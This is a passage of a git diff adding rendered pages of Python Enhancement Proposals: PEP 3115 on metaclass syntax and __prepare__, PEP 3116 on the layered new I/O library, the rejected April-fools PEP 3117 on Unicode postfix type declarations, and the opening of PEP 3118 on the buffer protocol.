class Foo(base1, base2, metaclass=mymeta):
+    ...
+
+
+

Additional keywords will also be allowed here, and will be passed to +the metaclass, as in the following example:

+
class Foo(base1, base2, metaclass=mymeta, private=True):
+    ...
+
+
+

Note that this PEP makes no attempt to define what these other +keywords might be - that is up to metaclass implementors to +determine.
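As a hedged sketch under the semantics that eventually shipped in Python 3 (the Meta and private names are invented for illustration), an implementor-defined keyword travels to the metaclass like this:

class Meta(type):
    def __new__(mcls, name, bases, namespace, private=False):
        cls = super().__new__(mcls, name, bases, namespace)
        cls._private = private          # stash the extra class keyword
        return cls

    def __init__(cls, name, bases, namespace, private=False):
        # type.__init__ rejects unknown keywords, so absorb it here as well.
        super().__init__(name, bases, namespace)

class Foo(metaclass=Meta, private=True):
    pass

assert Foo._private is True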

+

More generally, the parameter list passed to a class definition will +now support all of the features of a function call, meaning that you +can now use *args and **kwargs-style arguments in the class base +list:

+
class Foo(*bases, **kwds):
+    ...
+
+
+
+
+

Invoking the Metaclass

+

In the current metaclass system, the metaclass object can be any +callable type. This does not change; however, in order to fully +exploit all of the new features, the metaclass will need to have an +extra attribute which is used during class pre-construction.

+

This attribute is named __prepare__, which is invoked as a function +before the evaluation of the class body. The __prepare__ function +takes two positional arguments, and an arbitrary number of keyword +arguments. The two positional arguments are:

+ + + + + + + + + +
name: the name of the class being created.
bases: the list of base classes.
+

The interpreter always tests for the existence of __prepare__ before +calling it; if it is not present, then a regular dictionary is used, +as illustrated in the following Python snippet.

+
def prepare_class(name, *bases, metaclass=None, **kwargs):
+    if metaclass is None:
+        metaclass = compute_default_metaclass(bases)
+    prepare = getattr(metaclass, '__prepare__', None)
+    if prepare is not None:
+        return prepare(name, bases, **kwargs)
+    else:
+        return dict()
+
+
+

The example above illustrates how the arguments to ‘class’ are +interpreted. The class name is the first argument, followed by +an arbitrary length list of base classes. After the base classes, +there may be one or more keyword arguments, one of which can be +metaclass. Note that the metaclass argument is not included +in kwargs, since it is filtered out by the normal parameter +assignment algorithm. (Note also that metaclass is a +keyword-only argument as per PEP 3102.)

+

Even though __prepare__ is not required, the default metaclass +(‘type’) implements it, for the convenience of subclasses calling +it via super().

+

__prepare__ returns a dictionary-like object which is used to store +the class member definitions during evaluation of the class body. +In other words, the class body is evaluated as a function block +(just like it is now), except that the local variables dictionary +is replaced by the dictionary returned from __prepare__. This +dictionary object can be a regular dictionary or a custom mapping +type.

+

This dictionary-like object is not required to support the full +dictionary interface. A dictionary which supports a limited set of +dictionary operations will restrict what kinds of actions can occur +during evaluation of the class body. A minimal implementation might +only support adding and retrieving values from the dictionary - most +class bodies will do no more than that during evaluation. For some +classes, it may be desirable to support deletion as well. Many +metaclasses will need to make a copy of this dictionary afterwards, +so iteration or other means for reading out the dictionary contents +may also be useful.

+

The __prepare__ method will most often be implemented as a class +method rather than an instance method because it is called before +the metaclass instance (i.e. the class itself) is created.

+

Once the class body has finished evaluating, the metaclass will be +called (as a callable) with the class dictionary, which is no +different from the current metaclass mechanism.

+

Typically, a metaclass will create a custom dictionary - either a +subclass of dict, or a wrapper around it - that will contain +additional properties that are set either before or during the +evaluation of the class body. Then in the second phase, the +metaclass can use these additional properties to further customize +the class.

+

An example would be a metaclass that uses information about the +ordering of member declarations to create a C struct. The metaclass +would provide a custom dictionary that simply keeps a record of the +order of insertions. This does not need to be a full ‘ordered dict’ +implementation, but rather just a Python list of (key,value) pairs +that is appended to for each insertion.

+

Note that in such a case, the metaclass would be required to deal +with the possibility of duplicate keys, but in most cases that is +trivial. The metaclass can use the first declaration, the last, +combine them in some fashion, or simply throw an exception. It’s up +to the metaclass to decide how it wants to handle that case.

+
+
+

Example

+

Here’s a simple example of a metaclass which creates a list of +the names of all class members, in the order that they were +declared:

+
# The custom dictionary
+class member_table(dict):
+    def __init__(self):
+        self.member_names = []
+
+    def __setitem__(self, key, value):
+        # if the key is not already defined, add to the
+        # list of keys.
+        if key not in self:
+            self.member_names.append(key)
+
+        # Call superclass
+        dict.__setitem__(self, key, value)
+
+# The metaclass
+class OrderedClass(type):
+
+    # The prepare function
+    @classmethod
+    def __prepare__(metacls, name, bases): # No keywords in this case
+        return member_table()
+
+    # The metaclass invocation
+    def __new__(cls, name, bases, classdict):
+        # Note that we replace the classdict with a regular
+        # dict before passing it to the superclass, so that we
+        # don't continue to record member names after the class
+        # has been created.
+        result = type.__new__(cls, name, bases, dict(classdict))
+        result.member_names = classdict.member_names
+        return result
+
+class MyClass(metaclass=OrderedClass):
+    # method1 goes in array element 0
+    def method1(self):
+        pass
+
+    # method2 goes in array element 1
+    def method2(self):
+        pass
+
+
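For illustration (not text from the PEP), on a modern CPython the recorded order looks like this; the exact dunder entries depend on the interpreter version:

print(MyClass.member_names)
# e.g. ['__module__', '__qualname__', 'method1', 'method2']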
+
+
+

Sample Implementation

+

Guido van Rossum has created a patch which implements the new +functionality: https://bugs.python.org/issue1681101

+
+
+

Alternate Proposals

+

Josiah Carlson proposed using the name ‘type’ instead of +‘metaclass’, on the theory that what is really being specified is +the type of the type. While this is technically correct, it is also +confusing from the point of view of a programmer creating a new +class. From the application programmer’s point of view, the ‘type’ +that they are interested in is the class that they are writing; the +type of that type is the metaclass.

+

There were some objections in the discussion to the ‘two-phase’ +creation process, where the metaclass is invoked twice, once to +create the class dictionary and once to ‘finish’ the class. Some +people felt that these two phases should be completely separate, in +that there ought to be separate syntax for specifying the custom +dict as for specifying the metaclass. However, in most cases, the +two will be intimately tied together, and the metaclass will most +likely have an intimate knowledge of the internal details of the +class dict. Requiring the programmer to ensure that the correct dict +type and the correct metaclass type are used together creates an +additional and unneeded burden on the programmer.

+

Another good suggestion was to simply use an ordered dict for all +classes, and skip the whole ‘custom dict’ mechanism. This was based +on the observation that most use cases for a custom dict were for +the purposes of preserving order information. However, this idea has +several drawbacks, first because it means that an ordered dict +implementation would have to be added to the set of built-in types +in Python, and second because it would impose a slight speed (and +complexity) penalty on all class declarations. Later, several people +came up with ideas for use cases for custom dictionaries other +than preserving field orderings, so this idea was dropped.

+
+
+

Backwards Compatibility

+

It would be possible to leave the existing __metaclass__ syntax in +place. Alternatively, it would not be too difficult to modify the +syntax rules of the Py3K translation tool to convert from the old to +the new syntax.

+
+
+

References

+

[1] [Python-3000] Metaclasses in Py3K (original proposal) + https://mail.python.org/pipermail/python-3000/2006-December/005030.html

+

[2] [Python-3000] Metaclasses in Py3K (Guido’s suggested syntax) + https://mail.python.org/pipermail/python-3000/2006-December/005033.html

+

[3] [Python-3000] Metaclasses in Py3K (Objections to two-phase init) + https://mail.python.org/pipermail/python-3000/2006-December/005108.html

+

[4] [Python-3000] Metaclasses in Py3K (Always use an ordered dict) + https://mail.python.org/pipermail/python-3000/2006-December/005118.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3115.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-3116/index.html b/pep-3116/index.html new file mode 100644 index 00000000000..5ce98c01186 --- /dev/null +++ b/pep-3116/index.html @@ -0,0 +1,588 @@ + PEP 3116 – New I/O | peps.python.org
+
+


+ + +
+
+
+

PEP 3116 – New I/O

+
+
Author:
+
Daniel Stutzbach <daniel at stutzbachenterprises.com>, +Guido van Rossum <guido at python.org>, +Mike Verdone <mike.verdone at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Feb-2007
+
Python-Version:
+
3.0
+
Post-History:
+
26-Feb-2007
+
+
+
+
+
+

Rationale and Goals

+

Python allows for a variety of stream-like (a.k.a. file-like) objects +that can be used via read() and write() calls. Anything that +provides read() and write() is stream-like. However, more +exotic and extremely useful functions like readline() or +seek() may or may not be available on every stream-like object. +Python needs a specification for basic byte-based I/O streams to which +we can add buffering and text-handling features.

+

Once we have a defined raw byte-based I/O interface, we can add +buffering and text handling layers on top of any byte-based I/O class. +The same buffering and text handling logic can be used for files, +sockets, byte arrays, or custom I/O classes developed by Python +programmers. Developing a standard definition of a stream lets us +separate stream-based operations like read() and write() from +implementation-specific operations like fileno() and isatty(). +It encourages programmers to write code that uses streams as streams +and not to require that all streams support file-specific or +socket-specific operations.

+

The new I/O spec is intended to be similar to the Java I/O libraries, +but generally less confusing. Programmers who don’t want to muck +about in the new I/O world can expect that the open() factory +method will produce an object backwards-compatible with old-style file +objects.

+
+
+

Specification

+

The Python I/O Library will consist of three layers: a raw I/O layer, +a buffered I/O layer, and a text I/O layer. Each layer is defined by +an abstract base class, which may have multiple implementations. The +raw I/O and buffered I/O layers deal with units of bytes, while the +text I/O layer deals with units of characters.

+
+
+

Raw I/O

+

The abstract base class for raw I/O is RawIOBase. It has several +methods which are wrappers around the appropriate operating system +calls. If one of these functions would not make sense on the object, +the implementation must raise an IOError exception. For example, if a +file is opened read-only, the .write() method will raise an +IOError. As another example, if the object represents a socket, +then .seek(), .tell(), and .truncate() will raise an +IOError. Generally, a call to one of these functions maps to +exactly one operating system call.

+
+
.read(n: int) -> bytes
+
Read up to n bytes from the object and return them. Fewer +than n bytes may be returned if the operating system call +returns fewer than n bytes. If 0 bytes are returned, this +indicates end of file. If the object is in non-blocking mode +and no bytes are available, the call returns None.
+

.readinto(b: bytes) -> int

+
+
Read up to len(b) bytes from the object and store them in +b, returning the number of bytes read. Like .read, fewer +than len(b) bytes may be read, and 0 indicates end of file. +None is returned if a non-blocking object has no bytes +available. The length of b is never changed.
+

.write(b: bytes) -> int

+
+
Returns the number of bytes written, which may be < len(b).
+

.seek(pos: int, whence: int = 0) -> int

+

.tell() -> int

+

.truncate(n: int = None) -> int

+

.close() -> None

+
+

Additionally, it defines a few other methods:

+
+
.readable() -> bool
+
Returns True if the object was opened for reading, +False otherwise. If False, .read() will raise an +IOError if called.
+

.writable() -> bool

+
+
Returns True if the object was opened for writing, +False otherwise. If False, .write() and +.truncate() will raise an IOError if called.
+

.seekable() -> bool

+
+
Returns True if the object supports random access (such as +disk files), or False if the object only supports +sequential access (such as sockets, pipes, and ttys). If +False, .seek(), .tell(), and .truncate() will +raise an IOError if called.
+

.__enter__() -> ContextManager

+
+
Context management protocol. Returns self.
+

.__exit__(...) -> None

+
+
Context management protocol. Same as .close().
+
+

If and only if a RawIOBase implementation operates on an +underlying file descriptor, it must additionally provide a +.fileno() member function. This could be defined specifically by +the implementation, or a mix-in class could be used (need to decide +about this).

+
+
.fileno() -> int
+
Returns the underlying file descriptor (an integer)
+
+

Initially, three implementations will be provided that implement the +RawIOBase interface: FileIO, SocketIO (in the socket +module), and BytesIO. Each implementation must determine whether +the object supports random access as the information provided by the +user may not be sufficient (consider open("/dev/tty", "rw") or +open("/tmp/named-pipe", "rw")). As an example, FileIO can +determine this by calling the seek() system call; if it returns an +error, the object does not support random access. Each implementation +may provide additional methods appropriate to its type. The +BytesIO object is analogous to Python 2’s cStringIO library, +but operating on the new bytes type instead of strings.
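A minimal sketch against io.RawIOBase as it later shipped (the ZeroIO name is invented for illustration): only readable() and readinto() are supplied, and the buffering layer builds read() on top of them:

import io

class ZeroIO(io.RawIOBase):
    """Toy raw stream: an endless source of zero bytes."""
    def readable(self):
        return True

    def readinto(self, b):
        # Fill the caller-supplied buffer in place; return the byte count.
        n = len(b)
        b[:n] = bytes(n)
        return n

reader = io.BufferedReader(ZeroIO())
assert reader.read(4) == b"\x00\x00\x00\x00"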

+
+
+

Buffered I/O

+

The next layer is the Buffered I/O layer which provides more efficient +access to file-like objects. The abstract base class for all Buffered +I/O implementations is BufferedIOBase, which provides similar methods +to RawIOBase:

+
+
.read(n: int = -1) -> bytes
+
Returns the next n bytes from the object. It may return +fewer than n bytes if end-of-file is reached or the object is +non-blocking. 0 bytes indicates end-of-file. This method may +make multiple calls to RawIOBase.read() to gather the bytes, +or may make no calls to RawIOBase.read() if all of the needed +bytes are already buffered.
+

.readinto(b: bytes) -> int

+

.write(b: bytes) -> int

+
+
Write b bytes to the buffer. The bytes are not guaranteed to +be written to the Raw I/O object immediately; they may be +buffered. Returns len(b).
+

.seek(pos: int, whence: int = 0) -> int

+

.tell() -> int

+

.truncate(pos: int = None) -> int

+

.flush() -> None

+

.close() -> None

+

.readable() -> bool

+

.writable() -> bool

+

.seekable() -> bool

+

.__enter__() -> ContextManager

+

.__exit__(...) -> None

+
+

Additionally, the abstract base class provides one member variable:

+
+
.raw
+
A reference to the underlying RawIOBase object.
+
+

The BufferedIOBase method signatures are mostly identical to those +of RawIOBase (exceptions: write() returns None, +read()’s argument is optional), but may have different semantics. +In particular, BufferedIOBase implementations may read more data +than requested or delay writing data using buffers. For the most +part, this will be transparent to the user (unless, for example, they +open the same file through a different descriptor). Also, raw reads +may return a short read without any particular reason; buffered reads +will only return a short read if EOF is reached; and raw writes may +return a short count (even when non-blocking I/O is not enabled!), +while buffered writes will raise IOError when not all bytes could +be written or buffered.

+

There are four implementations of the BufferedIOBase abstract base +class, described below.

+
+

BufferedReader

+

The BufferedReader implementation is for sequential-access +read-only objects. Its .flush() method is a no-op.

+
+
+

BufferedWriter

+

The BufferedWriter implementation is for sequential-access +write-only objects. Its .flush() method forces all cached data to +be written to the underlying RawIOBase object.

+
+
+

BufferedRWPair

+

The BufferedRWPair implementation is for sequential-access +read-write objects such as sockets and ttys. As the read and write +streams of these objects are completely independent, it could be +implemented by simply incorporating a BufferedReader and +BufferedWriter instance. It provides a .flush() method that +has the same semantics as a BufferedWriter’s .flush() method.

+
+
+

BufferedRandom

+

The BufferedRandom implementation is for all random-access +objects, whether they are read-only, write-only, or read-write. +Compared to the previous classes that operate on sequential-access +objects, the BufferedRandom class must contend with the user +calling .seek() to reposition the stream. Therefore, an instance +of BufferedRandom must keep track of both the logical and true +position within the object. It provides a .flush() method that +forces all cached write data to be written to the underlying +RawIOBase object and all cached read data to be forgotten (so that +future reads are forced to go back to the disk).

+

Q: Do we want to mandate in the specification that switching between +reading and writing on a read-write object implies a .flush()? Or is +that an implementation convenience that users should not rely on?

+

For a read-only BufferedRandom object, .writable() returns +False and the .write() and .truncate() methods throw +IOError.

+

For a write-only BufferedRandom object, .readable() returns +False and the .read() method throws IOError.

+
+
+
+

Text I/O

+

The text I/O layer provides functions to read and write strings from +streams. Some new features include universal newlines and character +set encoding and decoding. The Text I/O layer is defined by a +TextIOBase abstract base class. It provides several methods that +are similar to the BufferedIOBase methods, but operate on a +per-character basis instead of a per-byte basis. These methods are:

+
+
.read(n: int = -1) -> str

.write(s: str) -> int

+

.tell() -> object

+
+
Return a cookie describing the current file position. +The only supported use for the cookie is with .seek() +with whence set to 0 (i.e. absolute seek).
+

.seek(pos: object, whence: int = 0) -> int

+
+
Seek to position pos. If pos is non-zero, it must +be a cookie returned from .tell() and whence must be zero.
+

.truncate(pos: object = None) -> int

+
+
Like BufferedIOBase.truncate(), except that pos (if +not None) must be a cookie previously returned by .tell().
+
+

Unlike with raw I/O, the units for .seek() are not specified - some +implementations (e.g. StringIO) use characters and others +(e.g. TextIOWrapper) use bytes. The special case for zero is to +allow going to the start or end of a stream without a prior +.tell(). An implementation could include stream encoder state in +the cookie returned from .tell().
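A hedged illustration with the text layer as it shipped: treat the value from .tell() as opaque and hand it back only to .seek():

import io

t = io.StringIO("héllo\nworld\n")
t.readline()                 # consume the first line
cookie = t.tell()            # opaque position cookie
t.readline()                 # move elsewhere
t.seek(cookie)               # whence defaults to 0 (absolute)
assert t.readline() == "world\n"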

+

TextIOBase implementations also provide several methods that are +pass-throughs to the underlying BufferedIOBase objects:

+
+
.flush() -> None

.close() -> None

+

.readable() -> bool

+

.writable() -> bool

+

.seekable() -> bool

+
+

TextIOBase class implementations additionally provide the +following methods:

+
+
.readline() -> str
+
Read until newline or EOF and return the line, or "" if +EOF hit immediately.
+

.__iter__() -> Iterator

+
+
Returns an iterator that returns lines from the file (which +happens to be self).
+

.next() -> str

+
+
Same as readline() except raises StopIteration if EOF +hit immediately.
+
+

Two implementations will be provided by the Python library. The +primary implementation, TextIOWrapper, wraps a Buffered I/O +object. Each TextIOWrapper object has a property named +“.buffer” that provides a reference to the underlying +BufferedIOBase object. Its initializer has the following +signature:

+
+
.__init__(self, buffer, encoding=None, errors=None, newline=None, line_buffering=False)
+
buffer is a reference to the BufferedIOBase object to +be wrapped with the TextIOWrapper.

encoding refers to an encoding to be used for translating +between the byte-representation and character-representation. +If it is None, then the system’s locale setting will be +used as the default.

+

errors is an optional string indicating error handling. +It may be set whenever encoding may be set. It defaults +to 'strict'.

+

newline can be None, '', '\n', '\r', or +'\r\n'; all other values are illegal. It controls the +handling of line endings. It works as follows:

+
    +
  • On input, if newline is None, universal newlines +mode is enabled. Lines in the input can end in '\n', +'\r', or '\r\n', and these are translated into +'\n' before being returned to the caller. If it is +'', universal newline mode is enabled, but line endings +are returned to the caller untranslated. If it has any of +the other legal values, input lines are only terminated by +the given string, and the line ending is returned to the +caller untranslated. (In other words, translation to +'\n' only occurs if newline is None.)
  • +
  • On output, if newline is None, any '\n' +characters written are translated to the system default +line separator, os.linesep. If newline is '', +no translation takes place. If newline is any of the +other legal values, any '\n' characters written are +translated to the given string. (Note that the rules +guiding translation are different for output than for +input.)
  • +
+

line_buffering, if True, causes write() calls to imply +a flush() if the string written contains at least one +'\n' or '\r' character. This is set by open() +when it detects that the underlying stream is a TTY device, +or when a buffering argument of 1 is passed.

+

Further notes on the newline parameter (a short illustration follows these notes):

+
    +
  • '\r' support is still needed for some OSX applications +that produce files using '\r' line endings; Excel (when +exporting to text) and Adobe Illustrator EPS files are the +most common examples.
  • +
  • If translation is enabled, it happens regardless of which +method is called for reading or writing. For example, +f.read() will always produce the same result as +''.join(f.readlines()).
  • +
  • If universal newlines without translation are requested on +input (i.e. newline=''), if a system read operation +returns a buffer ending in '\r', another system read +operation is done to determine whether it is followed by +'\n' or not. In universal newlines mode with +translation, the second system read operation may be +postponed until the next read request, and if the following +system read operation returns a buffer starting with +'\n', that character is simply discarded.
  • +
+
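A hedged illustration of the input-side newline rules, using io.TextIOWrapper as it eventually shipped:

import io

raw = b"one\r\ntwo\rthree\n"
# newline=None: universal newlines, translated to '\n' on the way in.
text = io.TextIOWrapper(io.BytesIO(raw), encoding="ascii", newline=None)
assert text.read() == "one\ntwo\nthree\n"
# newline='': universal newlines recognized, but returned untranslated.
text = io.TextIOWrapper(io.BytesIO(raw), encoding="ascii", newline="")
assert text.read() == "one\r\ntwo\rthree\n"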
+
+

Another implementation, StringIO, creates a file-like TextIO +implementation without an underlying Buffered I/O object. While +similar functionality could be provided by wrapping a BytesIO +object in a TextIOWrapper, the StringIO object allows for much +greater efficiency as it does not need to actually perform encoding +and decoding. A String I/O object can just store the encoded string +as-is. The StringIO object’s __init__ signature takes an +optional string specifying the initial value; the initial position is +always 0. It does not support encodings or newline translations; you +always read back exactly the characters you wrote.

+
+

Unicode encoding/decoding Issues

+

We should allow changing the encoding and error-handling +setting later. The behavior of Text I/O operations in the face of +Unicode problems and ambiguities (e.g. diacritics, surrogates, invalid +bytes in an encoding) should be the same as that of the unicode +encode()/decode() methods. UnicodeError may be raised.

+

Implementation note: we should be able to reuse much of the +infrastructure provided by the codecs module. If it doesn’t +provide the exact APIs we need, we should refactor it to avoid +reinventing the wheel.

+
+
+
+

Non-blocking I/O

+

Non-blocking I/O is fully supported on the Raw I/O level only. If a +raw object is in non-blocking mode and an operation would block, then +.read() and .readinto() return None, while .write() +returns 0. In order to put an object in non-blocking mode, +the user must extract the fileno and do it by hand.

+

At the Buffered I/O and Text I/O layers, if a read or write fails due +to a non-blocking condition, they raise an IOError with errno set +to EAGAIN.

+

Originally, we considered propagating up the Raw I/O behavior, but +many corner cases and problems were raised. To address these issues, +significant changes would need to have been made to the Buffered I/O +and Text I/O layers. For example, what should .flush() do on a +Buffered non-blocking object? How would the user instruct the object +to “Write as much as you can from your buffer, but don’t block”? A +non-blocking .flush() that doesn’t necessarily flush all available +data is counter-intuitive. Since non-blocking and blocking objects +would have such different semantics at these layers, it was agreed to +abandon efforts to combine them into a single type.

+
+
+

The open() Built-in Function

+

The open() built-in function is specified by the following +pseudo-code:

+
def open(filename, mode="r", buffering=None, *,
+         encoding=None, errors=None, newline=None):
+    assert isinstance(filename, (str, int))
+    assert isinstance(mode, str)
+    assert buffering is None or isinstance(buffering, int)
+    assert encoding is None or isinstance(encoding, str)
+    assert newline in (None, "", "\n", "\r", "\r\n")
+    modes = set(mode)
+    if modes - set("arwb+t") or len(mode) > len(modes):
+        raise ValueError("invalid mode: %r" % mode)
+    reading = "r" in modes
+    writing = "w" in modes
+    binary = "b" in modes
+    appending = "a" in modes
+    updating = "+" in modes
+    text = "t" in modes or not binary
+    if text and binary:
+        raise ValueError("can't have text and binary mode at once")
+    if reading + writing + appending > 1:
+        raise ValueError("can't have read/write/append mode at once")
+    if not (reading or writing or appending):
+        raise ValueError("must have exactly one of read/write/append mode")
+    if binary and encoding is not None:
+        raise ValueError("binary modes doesn't take an encoding arg")
+    if binary and errors is not None:
+        raise ValueError("binary modes doesn't take an errors arg")
+    if binary and newline is not None:
+        raise ValueError("binary modes doesn't take a newline arg")
+    # XXX Need to spec the signature for FileIO()
+    raw = FileIO(filename, mode)
+    line_buffering = (buffering == 1 or buffering is None and raw.isatty())
+    if line_buffering or buffering is None:
+        buffering = 8*1024  # International standard buffer size
+        # XXX Try setting it to fstat().st_blksize
+    if buffering < 0:
+        raise ValueError("invalid buffering size")
+    if buffering == 0:
+        if binary:
+            return raw
+        raise ValueError("can't have unbuffered text I/O")
+    if updating:
+        buffer = BufferedRandom(raw, buffering)
+    elif writing or appending:
+        buffer = BufferedWriter(raw, buffering)
+    else:
+        assert reading
+        buffer = BufferedReader(raw, buffering)
+    if binary:
+        return buffer
+    assert text
+    return TextIOWrapper(buffer, encoding, errors, newline, line_buffering)
+
+
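For illustration, the layering chosen by this pseudo-code is observable in the io module that implemented it (the file name is arbitrary):

import io

with open("demo.bin", "wb", buffering=0) as raw:
    assert isinstance(raw, io.FileIO)               # unbuffered binary: raw layer
    raw.write(b"data")
with open("demo.bin", "rb") as buffered:
    assert isinstance(buffered, io.BufferedReader)  # buffered binary layer
with open("demo.bin", "r") as text:
    assert isinstance(text, io.TextIOWrapper)       # text layer on top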
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3116.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-3117/index.html b/pep-3117/index.html new file mode 100644 index 00000000000..1a22b8bc2c8 --- /dev/null +++ b/pep-3117/index.html @@ -0,0 +1,378 @@ + PEP 3117 – Postfix type declarations | peps.python.org
+
+


+ + +
+
+
+

PEP 3117 – Postfix type declarations

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes the addition of a postfix type declaration syntax to +Python. It also specifies a new typedef statement which is used to create +new mappings between types and declarators.

+

Its acceptance will greatly enhance the Python user experience as well as +eliminate one of the warts that deter users of other programming languages from +switching to Python.

+
+
+

Rationale

+

Python has long suffered from the lack of explicit type declarations. Being one +of the few aspects in which the language deviates from its Zen, this wart has +sparked many a discussion between Python heretics and members of the PSU (for +a few examples, see [EX1], [EX2] or [EX3]), and it has also made large-scale +enterprise success unlikely.

+

However, if one wants to put an end to this misery, a decent Pythonic syntax +must be found. In almost all languages that have them, type declarations lack +this quality: they are verbose, often needing multiple words for a single +type, or they are hard to comprehend (e.g., a certain language uses completely +unrelated [1] adjectives like dim for type declaration).

+

Therefore, this PEP combines the move to type declarations with another bold +move that will once again prove that Python is not only future-proof but +future-embracing: the introduction of Unicode characters as an integral +constituent of source code.

+

Unicode makes it possible to express much more with far fewer characters, which +is in accordance with the Zen (“Readability counts.”). Additionally, it +eliminates the need for a separate type declaration statement, and last but not +least, it makes Python measure up to Perl 6, which already uses Unicode for its +operators. [2]

+
+
+

Specification

+

When the type declaration mode is in operation, the grammar is changed so that +each NAME must consist of two parts: a name and a type declarator, which is +exactly one Unicode character.

+

The declarator uniquely specifies the type of the name, and if it occurs on the +left hand side of an expression, this type is enforced: an InquisitionError +exception is raised if the returned type doesn’t match the declared type. [3]

+

Also, function call result types have to be specified. If the result of the call +does not have the declared type, an InquisitionError is raised. Caution: the +declarator for the result should not be confused with the declarator for the +function object (see the example below).

+

Type declarators after names that are only read, not assigned to, are not strictly +necessary but enforced anyway (see the Python Zen: “Explicit is better than +implicit.”).

+

The mapping between types and declarators is not static. It can be completely +customized by the programmer, but for convenience there are some predefined +mappings for some built-in types:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Type           Declarator
object         � (REPLACEMENT CHARACTER)
int            ℕ (DOUBLE-STRUCK CAPITAL N)
float          ℮ (ESTIMATED SYMBOL)
bool           ✓ (CHECK MARK)
complex        ℂ (DOUBLE-STRUCK CAPITAL C)
str            ✎ (LOWER RIGHT PENCIL)
unicode        ✒ (BLACK NIB)
tuple          ⒯ (PARENTHESIZED LATIN SMALL LETTER T)
list           ♨ (HOT SPRINGS)
dict           ⧟ (DOUBLE-ENDED MULTIMAP)
set            ∅ (EMPTY SET) (Note: this is also for full sets)
frozenset      ☃ (SNOWMAN)
datetime       ⌚ (WATCH)
function       ƛ (LATIN SMALL LETTER LAMBDA WITH STROKE)
generator      ⚛ (ATOM SYMBOL)
Exception      ⌁ (ELECTRIC ARROW)
+

The declarator for the None type is a zero-width space.

+

These characters should be obvious and easy to remember and type for every +programmer.

+
+
+

Unicode replacement units

+

Since even in our modern, globalized world there are still some old-fashioned +rebels who can’t or don’t want to use Unicode in their source code, and since +Python is a forgiving language, a fallback is provided for those:

+

Instead of the single Unicode character, they can type name${UNICODE NAME OF +THE DECLARATOR}$. For example, these two function definitions are equivalent:

+
def fooƛ(xℂ):
+    return None
+
+
+

and

+
def foo${LATIN SMALL LETTER LAMBDA WITH STROKE}$(x${DOUBLE-STRUCK CAPITAL C}$):
+    return None${ZERO WIDTH NO-BREAK SPACE}$
+
+
+

This is still easy to read and makes the full power of type-annotated Python +available to ASCII believers.

+
+
+

The typedef statement

+

The mapping between types and declarators can be extended with this new statement.

+

The syntax is as follows:

+
typedef_stmt  ::=  "typedef" expr DECLARATOR
+
+
+

where expr resolves to a type object. For convenience, the typedef statement +can also be mixed with the class statement for new classes, like so:

+
typedef class Foo☺(object�):
+    pass
+
+
+
+
+

Example

+

This is the standard os.path.normpath function, converted to type declaration +syntax:

+
def normpathƛ(path✎)✎:
+    """Normalize path, eliminating double slashes, etc."""
+    if path✎ == '':
+        return '.'
+    initial_slashes✓ = path✎.startswithƛ('/')✓
+    # POSIX allows one or two initial slashes, but treats three or more
+    # as single slash.
+    if (initial_slashes✓ and
+        path✎.startswithƛ('//')✓ and not path✎.startswithƛ('///')✓)✓:
+        initial_slashesℕ = 2
+    comps♨ = path✎.splitƛ('/')♨
+    new_comps♨ = []♨
+    for comp✎ in comps♨:
+        if comp✎ in ('', '.')⒯:
+            continue
+        if (comp✎ != '..' or (not initial_slashesℕ and not new_comps♨)✓ or
+             (new_comps♨ and new_comps♨[-1]✎ == '..')✓)✓:
+            new_comps♨.appendƛ(comp✎)
+        elif new_comps♨:
+            new_comps♨.popƛ()✎
+    comps♨ = new_comps♨
+    path✎ = '/'.join(comps♨)✎
+    if initial_slashesℕ:
+        path✎ = '/'*initial_slashesℕ + path✎
+    return path✎ or '.'
+
+
+

As you can clearly see, the type declarations add expressiveness, while at the +same time they make the code look much more professional.

+
+
+

Compatibility issues

+

To enable type declaration mode, one has to write:

+
from __future__ import type_declarations
+
+
+

which enables Unicode parsing of the source [4], makes typedef a keyword +and enforces correct types for all assignments and function calls.

+
+
+

Rejection

+

After careful consideration, much soul-searching, gnashing of teeth and rending +of garments, it has been decided to reject this PEP.

+
+
+

References

+ + +
+
+

Acknowledgements

+

Many thanks go to Armin Ronacher, Alexander Schremmer and Marek Kubica who helped +find the most suitable and mnemonic declarator for built-in types.

+

Thanks also to the Unicode Consortium for including all those useful characters +in the Unicode standard.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3117.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-3118/index.html b/pep-3118/index.html new file mode 100644 index 00000000000..d2f8f05f51c --- /dev/null +++ b/pep-3118/index.html @@ -0,0 +1,1030 @@ + PEP 3118 – Revising the buffer protocol | peps.python.org
+
+


+ + +
+
+
+

PEP 3118 – Revising the buffer protocol

+
+
Author:
+
Travis Oliphant <oliphant at ee.byu.edu>, Carl Banks <pythondev at aerojockey.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Aug-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes re-designing the buffer interface (PyBufferProcs +function pointers) to improve the way Python allows memory sharing in +Python 3.0.

+

In particular, it is proposed that the character buffer portion +of the API be eliminated and the multiple-segment portion be +re-designed in conjunction with allowing for strided memory +to be shared. In addition, the new buffer interface will +allow the sharing of any multi-dimensional nature of the +memory and what data-format the memory contains.

+

This interface will allow any extension module to either +create objects that share memory or create algorithms that +use and manipulate raw memory from arbitrary objects that +export the interface.

+
+
+

Rationale

+

The Python 2.X buffer protocol allows different Python types to +exchange a pointer to a sequence of internal buffers. This +functionality is extremely useful for sharing large segments of +memory between different high-level objects, but it is too limited and +has issues:

+
    +
  1. There is the little used “sequence-of-segments” option +(bf_getsegcount) that is not well motivated.
  2. +
  3. There is the apparently redundant character-buffer option +(bf_getcharbuffer)
  4. +
